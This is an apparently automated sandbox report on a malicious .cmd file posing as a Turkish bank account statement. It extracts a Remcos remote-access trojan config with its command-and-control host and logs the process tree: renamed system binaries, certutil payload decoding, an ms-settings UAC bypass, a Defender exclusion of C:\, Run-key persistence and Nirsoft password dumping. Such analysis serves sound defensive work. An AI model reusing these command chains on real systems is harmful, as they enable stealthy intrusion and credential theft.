Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 09:03
Static task
static1
Behavioral task
behavioral1
Sample
41570002689_20220814_05352297_HesapOzeti.cmd
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
41570002689_20220814_05352297_HesapOzeti.cmd
Resource
win10v2004-20240709-en
General
-
Target
41570002689_20220814_05352297_HesapOzeti.cmd
-
Size
2.8MB
-
MD5
eb8ef270dfe6887b0c964f718f16bbb8
-
SHA1
10a639e651479bfba415991779c24b9377b84a5d
-
SHA256
0040025ba2e8d93e1d1c118280257575f28c2e2209707bb9a11c15676c55e944
-
SHA512
89dcc90d565e6b5217775638fbd6edaaedbc8dba5de0cee810b27a791603b9980d022b025f66d3ee3692e797ef70bf290611b6e714ff8167fe9e99efe1d4324b
-
SSDEEP
24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrnf3m2+K3v:Rr0jYNi8DrApkpUNLgVDzNVpeIh/f2+
Malware Config
Extracted
remcos
July 17
method890.ddns.net:6902
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-X2M1RF
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 8 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/3116-126-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2232-133-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2232-136-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2232-140-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3116-135-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4100-134-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4100-125-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4100-142-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/3116-126-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral2/memory/3116-135-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4100-134-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral2/memory/4100-125-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral2/memory/4100-142-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
lzfanvaS.pifper.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation lzfanvaS.pif Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 31 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeCLEAN.COMalpha.exealpha.exelzfanvaS.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exeper.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exeCLEAN.COMCLEAN.COMCLEAN.COMpid Process 2792 alpha.exe 4024 alpha.exe 64 kn.exe 3840 alpha.exe 3144 kn.exe 1588 CLEAN.COM 2712 alpha.exe 2416 alpha.exe 3320 lzfanvaS.pif 2236 alpha.exe 4240 alpha.exe 2944 alpha.exe 1348 alpha.exe 2792 alpha.exe 1524 alpha.exe 440 xkn.exe 3536 alpha.exe 4836 ger.exe 1836 per.exe 1544 alpha.exe 5116 alpha.exe 1788 alpha.exe 2708 alpha.exe 3364 alpha.exe 1872 alpha.exe 5108 alpha.exe 1780 alpha.exe 4628 alpha.exe 4100 CLEAN.COM 3116 CLEAN.COM 2232 CLEAN.COM -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
CLEAN.COMdescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CLEAN.COM -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
CLEAN.COMdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Savnafzl = "C:\\Users\\Public\\Savnafzl.url" CLEAN.COM -
Suspicious use of SetThreadContext 4 IoCs
Processes:
CLEAN.COMdescription pid Process procid_target PID 1588 set thread context of 3320 1588 CLEAN.COM 105 PID 1588 set thread context of 4100 1588 CLEAN.COM 142 PID 1588 set thread context of 3116 1588 CLEAN.COM 143 PID 1588 set thread context of 2232 1588 CLEAN.COM 144 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2936 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
xkn.exeCLEAN.COMCLEAN.COMpid Process 440 xkn.exe 440 xkn.exe 440 xkn.exe 4100 CLEAN.COM 4100 CLEAN.COM 2232 CLEAN.COM 2232 CLEAN.COM 4100 CLEAN.COM 4100 CLEAN.COM -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
CLEAN.COMpid Process 1588 CLEAN.COM 1588 CLEAN.COM 1588 CLEAN.COM -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xkn.exetaskkill.exeCLEAN.COMdescription pid Process Token: SeDebugPrivilege 440 xkn.exe Token: SeDebugPrivilege 2936 taskkill.exe Token: SeDebugPrivilege 2232 CLEAN.COM -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CLEAN.COMpid Process 1588 CLEAN.COM -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeCLEAN.COMlzfanvaS.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid Process procid_target PID 2928 wrote to memory of 2888 2928 cmd.exe 85 PID 2928 wrote to memory of 2888 2928 cmd.exe 85 PID 2928 wrote to memory of 2792 2928 cmd.exe 86 PID 2928 wrote to memory of 2792 2928 cmd.exe 86 PID 2792 wrote to memory of 4632 2792 alpha.exe 87 PID 2792 wrote to memory of 4632 2792 alpha.exe 87 PID 2928 wrote to memory of 4024 2928 cmd.exe 88 PID 2928 wrote to memory of 4024 2928 cmd.exe 88 PID 4024 wrote to memory of 64 4024 alpha.exe 89 PID 4024 wrote to memory of 64 4024 alpha.exe 89 PID 2928 wrote to memory of 3840 2928 cmd.exe 90 PID 2928 wrote to memory of 3840 2928 cmd.exe 90 PID 3840 wrote to memory of 3144 3840 alpha.exe 91 PID 3840 wrote to memory of 3144 3840 alpha.exe 91 PID 2928 wrote to memory of 1588 2928 cmd.exe 93 PID 2928 wrote to memory of 1588 2928 cmd.exe 93 PID 2928 wrote to memory of 1588 2928 cmd.exe 93 PID 2928 wrote to memory of 2712 2928 cmd.exe 94 PID 2928 wrote to memory of 2712 2928 cmd.exe 94 PID 2928 wrote to memory of 2416 2928 cmd.exe 95 PID 2928 wrote to memory of 2416 2928 cmd.exe 95 PID 1588 wrote to memory of 3320 1588 CLEAN.COM 105 PID 1588 wrote to memory of 3320 1588 CLEAN.COM 105 PID 1588 wrote to memory of 3320 1588 CLEAN.COM 105 PID 1588 wrote to memory of 3320 1588 CLEAN.COM 105 PID 1588 wrote to memory of 3320 1588 CLEAN.COM 105 PID 3320 wrote to memory of 4676 3320 lzfanvaS.pif 106 PID 3320 wrote to memory of 4676 3320 lzfanvaS.pif 106 PID 4676 wrote to memory of 4356 4676 cmd.exe 109 PID 4676 wrote to memory of 4356 4676 cmd.exe 109 PID 4676 wrote to memory of 2236 4676 cmd.exe 110 PID 4676 wrote to memory of 2236 4676 cmd.exe 110 PID 4676 wrote to memory of 4240 4676 cmd.exe 111 PID 4676 wrote to memory of 4240 4676 cmd.exe 111 PID 4676 wrote to memory of 2944 4676 cmd.exe 112 PID 4676 wrote to memory of 2944 4676 cmd.exe 112 PID 2944 wrote to memory of 2888 2944 alpha.exe 113 PID 2944 wrote to memory of 2888 2944 alpha.exe 113 PID 4676 wrote to memory of 1348 4676 cmd.exe 114 PID 4676 wrote to memory of 1348 4676 cmd.exe 114 PID 1348 wrote to memory of 1636 1348 alpha.exe 115 PID 1348 wrote to memory of 1636 1348 alpha.exe 115 PID 4676 wrote to memory of 2792 4676 cmd.exe 116 PID 4676 wrote to memory of 2792 4676 cmd.exe 116 PID 2792 wrote to memory of 1316 2792 alpha.exe 117 PID 2792 wrote to memory of 1316 2792 alpha.exe 117 PID 4676 wrote to memory of 1524 4676 cmd.exe 118 PID 4676 wrote to memory of 1524 4676 cmd.exe 118 PID 1524 wrote to memory of 440 1524 alpha.exe 119 PID 1524 wrote to memory of 440 1524 alpha.exe 119 PID 440 wrote to memory of 3536 440 xkn.exe 120 PID 440 wrote to memory of 3536 440 xkn.exe 120 PID 3536 wrote to memory of 4836 3536 alpha.exe 121 PID 3536 wrote to memory of 4836 3536 alpha.exe 121 PID 4676 wrote to memory of 1836 4676 cmd.exe 122 PID 4676 wrote to memory of 1836 4676 cmd.exe 122 PID 4676 wrote to memory of 1544 4676 cmd.exe 127 PID 4676 wrote to memory of 1544 4676 cmd.exe 127 PID 1544 wrote to memory of 2936 1544 alpha.exe 128 PID 1544 wrote to memory of 2936 1544 alpha.exe 128 PID 4676 wrote to memory of 5116 4676 cmd.exe 131 PID 4676 wrote to memory of 5116 4676 cmd.exe 131 PID 5116 wrote to memory of 2640 5116 alpha.exe 132 PID 5116 wrote to memory of 2640 5116 alpha.exe 132
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2888
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:4632
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 93⤵
- Executes dropped EXE
PID:64
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 123⤵
- Executes dropped EXE
PID:3144
-
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Users\Public\Libraries\lzfanvaS.pifC:\Users\Public\Libraries\lzfanvaS.pif3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC87.tmp\CC98.tmp\CC99.bat C:\Users\Public\Libraries\lzfanvaS.pif"4⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"5⤵PID:4356
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "5⤵
- Executes dropped EXE
PID:2236
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"5⤵
- Executes dropped EXE
PID:4240
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"6⤵PID:2888
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"6⤵PID:1636
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"6⤵PID:1316
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""8⤵
- Executes dropped EXE
- Modifies registry class
PID:4836
-
-
-
-
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1836
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 25⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 26⤵
- Runs ping.exe
PID:2640
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"5⤵
- Executes dropped EXE
PID:1788
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"5⤵
- Executes dropped EXE
PID:2708
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"5⤵
- Executes dropped EXE
PID:3364
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S5⤵
- Executes dropped EXE
PID:1872
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S5⤵
- Executes dropped EXE
PID:5108
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S5⤵
- Executes dropped EXE
PID:1780
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S5⤵
- Executes dropped EXE
PID:4628
-
-
-
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Savnafzl.PIF3⤵PID:2636
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\wygdsajldzb"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4100
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\gslwtsumrhtarr"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
PID:3116
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\iuygmlfgmplfuylor"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2416
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:1508
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5ef5128854e0cbd0d1f136e7965b89498
SHA1b2d5cf355bd086e0196aff522816c374a14f7615
SHA256ad4d9228ac30c385d57bdbea06af956bf7f7b5e406a1be3a0985ec409045c1fa
SHA51258dcc60064128adcaf30b1296dd1e20a0b195faccd239f9e68f1bb98c52bd36aaba0b1f4fea0d9a75e2508a757a32979328a0b235a47b4dffe253787a4676248
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5463b5cfc270ed672e140fc2c1a25aec1
SHA123e37a49996b1208888e054fab11aa1e1a81f649
SHA2562bd023dd922e93f6c6f471751ae97a1fd24a93aa4230e53ac91b8c37dab9b185
SHA512b0fa0425dc462fa10a56fb28f36b84f3a0e6426922c1fd37e56c4406e713a00aef2bbc04024f06133d1f63960a97372feb32fd4ebf43105b9d9823f37820b4b6
-
Filesize
1.9MB
MD54c63a70c4224e12f302dc97da70bff09
SHA127da43a347a39fc3582ce98bb77726bf0f0d788b
SHA25600032a8c09f96d692586cfa0b0894bb12049e8266f9bc8c2a5950f4c542269fd
SHA512a21072370b65e9a0dc9a7be4c840c4353114e9e1f695cadd46ad1fab2fd751d27e9a38b6dad545bbcba2a2eb93c640791be31fc08e32f055c6fad4efec444544
-
Filesize
955KB
MD537d7e65db3d1daaba7f4f3a422f256c0
SHA1845ddbc4975214a41098d5d7d1a039e27a9acc9d
SHA256e6967254aa75982a43c73985e63d60f5b0688ceeb06c11c1748622959cb95c08
SHA512edb70bdda279422aaded553a3d6d5ad36c1659181394c4c488f41d257b5fa1707f0db456d2c549a7c8ec8944b3ca90703788ccce3f0d8cb26fc43b6fd42a3011
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459